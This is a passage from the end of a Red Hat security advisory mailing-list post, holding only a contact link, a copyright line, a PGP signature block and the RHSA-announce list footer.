details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrqy1AAoJENzjgjWX9erE78UP/3pGfGpruz+ko16UwA6z5pha  
k877FYX3KOFHStHNjSNHP/1h7qSjVJpoz53/SrEtPT8C3d/mBIr8A57GpgcIVL6N  
9TXZL+IuTrTZ81ZJePbSQCqUhuyLpdJVjMpObL1jLAe1VBBu56vfoNYI9s1zJTIH  
minA4Fserkl9ZBTd6lCTCzlbc+iS6R6CneHebkOeQB1hLdei7gAh00tExWF5BlX/  
WwCq7VmOA4vwV54YrImsC/RK2i50yJtHGm/vI0CP6bOyk+KSkStWKckjHz5A16TC  
z0BQjD/mPfUlEw4FAKWlnoc5awIpsNWxS86uAvvIrBmDchJTU+iZ+1k5bDeiGjP5  
xvSYgPrKYG1hAi2PcC7bTBM2b1dKbhiVJUrl7ZB9r6U/Y/N3U6V1uIj6Q/UID6Cs  
W17bI0DvKnmD0xBEe4DIvyrNLPwz4h7apjgIPT1P7iWgVlJnqU6bZ2wdKwVqpEhY  
nCLrw7p6Fa6n9VXTMxmoM4/mi2le44VAb8uUrnkHx8pFMowcVA01vEOqiqXUpEDZ  
RtNNTBJKhEj/SRYaE5VsNG2c6lDZhexhUCiA0uLTdQdnkAWHS8WFScuEa5TRmM6A  
4eQ5acyNm58iQPxXWcUrO79BaQThz678IrUPdx9PEuYbQamDsTVu/USQdrKQ70iq  
p8ltwpfh+tiWsb3kj811  
=xm/r  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js